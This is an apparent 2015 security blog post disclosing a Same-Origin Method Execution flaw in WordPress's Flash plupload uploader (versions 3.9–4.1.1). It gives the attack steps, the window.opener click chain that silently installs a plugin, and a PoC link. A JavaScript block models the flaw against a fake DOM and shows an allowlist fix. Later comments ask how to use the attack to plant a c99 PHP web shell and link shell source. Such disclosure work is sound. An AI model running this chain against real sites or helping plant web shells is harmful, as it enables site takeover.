Wednesday, 22 April 2015

plupload - Same-Origin Method Execution [Wordpress 3.9 - 4.1.1]

This January I found and reported an XSS vulnerability in plupload that affects WordPress from 3.9 to 4.1.1. Since there was no way to control the arguments of the called function, the "only" thing we could do with this issue was Same-Origin Method Execution.

Before you read the technical details, update your WordPress / plupload first.

If you dig a bit into the Flash plupload 2.1.2 source code, you will notice an interesting thing in the _init() function:


...and in _fireEvent():


So we can manipulate the target GET parameter to execute JavaScript functions, but we can use only alphanumeric characters and the dot. This is still useful; the scenario goes like this:

1. In the first tab, create a new window with target _blank and URL http://hostname/proxy.php.
2. Then redirect the first tab to http://target-wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description (of course you can use any other plugin-install page).
3. The second tab's proxy.php sleeps for a few seconds and then redirects to the vulnerable plupload on target-wordpress, calling this function:


window.opener.document.body.lastChild.previousElementSibling.previousElementSibling.previousElementSibling.lastChild.click()

4. ...aaaand the plugin is installed now. ;-)
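The callback bridge the post describes, modelled as an added example in plain JavaScript (not plupload's code): the lax alphanumeric-and-dot filter resolves the quoted window.opener chain against a constructed stand-in DOM and invokes it, while an allowlist lookup of fixed handler names rejects it. The handler names and the fake DOM objects are assumptions constructed for this example.

```javascript
// Added example, not plupload's code: a minimal model of the "target" callback
// bridge the post describes, beside an allowlist variant that closes the SOME hole.

// Vulnerable pattern (as described in the post): any dotted alphanumeric name
// is accepted, then resolved property by property from the global object and invoked.
const LAX_TARGET = /^[A-Za-z0-9.]+$/;

function laxInvoke(root, target) {
  if (!LAX_TARGET.test(target)) return undefined;
  const parts = target.split(".");
  const method = parts.pop();
  const obj = parts.reduce((o, p) => (o == null ? undefined : o[p]), root);
  return obj && typeof obj[method] === "function" ? obj[method]() : undefined;
}

// Hardened pattern: the caller-supplied name is only a key into a fixed table
// of handlers; it is never walked as a path, so window.opener is unreachable.
// Handler names are constructed for this example.
const HANDLERS = new Map([
  ["plupload.uploadReady", () => "uploadReady"],
  ["plupload.uploadProgress", () => "uploadProgress"],
]);

function allowlistInvoke(target) {
  const fn = HANDLERS.get(target);
  return fn ? fn() : undefined;
}

// Constructed stand-in for the global object of the attacker-opened window,
// shaped so the exact chain quoted in the post resolves to a clickable element
// on the opener's plugin-install page (no real DOM involved).
const installButton = { click: () => "clicked" };
const row = { lastChild: installButton };
const x2 = { previousElementSibling: row };
const x1 = { previousElementSibling: x2 };
const body = { lastChild: { previousElementSibling: x1 } };
const fakeGlobal = { opener: { document: { body } } };
fakeGlobal.window = fakeGlobal; // browsers expose window.window === window

const SOME_CHAIN = "window.opener.document.body.lastChild.previousElementSibling"
  + ".previousElementSibling.previousElementSibling.lastChild.click";
```

laxInvoke(fakeGlobal, SOME_CHAIN) returns "clicked" because the chain is nothing but letters and dots, whereas allowlistInvoke(SOME_CHAIN) returns undefined: the fix is to stop treating the parameter as a path at all, not to tighten the character set.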

This can of course be made more automated and faster, to install malicious or vulnerable plugins that after successful exploitation give us a webshell or anything else we need to own the machine. In my opinion, this can be really dangerous.

PoC: http://ropchain.org/poc/wordpress/

32 comments:

  1. This comment has been removed by the author.

  2. Where is the proxy.php script, please?

    Replies
    1. As mentioned, it just sleeps for a few seconds and does a redirect.



      Simple as that. :)

    2. http://pastebin.com/WuJxSgBH

  3. This comment has been removed by the author.

  4. Replies
    1. Which browser do you use?

      I believe that you're logged in as admin in WordPress during the test? ;-)

  5. I use FF.
    I'm not logged in :) I thought this was a fail to 'hack' a WP website ...

  6. Can I get the vulnerable flash file? I am not able to reproduce this.

    Replies
    1. You can find it by downloading an archived WordPress version (like 4.1.1).

    2. I tried on those older versions of WordPress only, but it is not working; I also noticed little changes in the flash file compared to the snippet given above in your blog, so I thought maybe the flash file has changed. Can you share your email ID please?

    3. It opens two tabs but the plugin is not getting installed; not sure what I am missing.

    4. DD, try to DM me on Twitter or visit http://ropchain.org/ for my e-mail.

  7. How would this look if I wanted to install a shell, let's say
    shell c99?
    https://r57.gen.tr/1464020527-c99.html

  8. https://r57.gen.tr/1464020527-c99.html
    wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description

    How to make it upload a php shell? That's not listed on the WordPress plugins website lol?
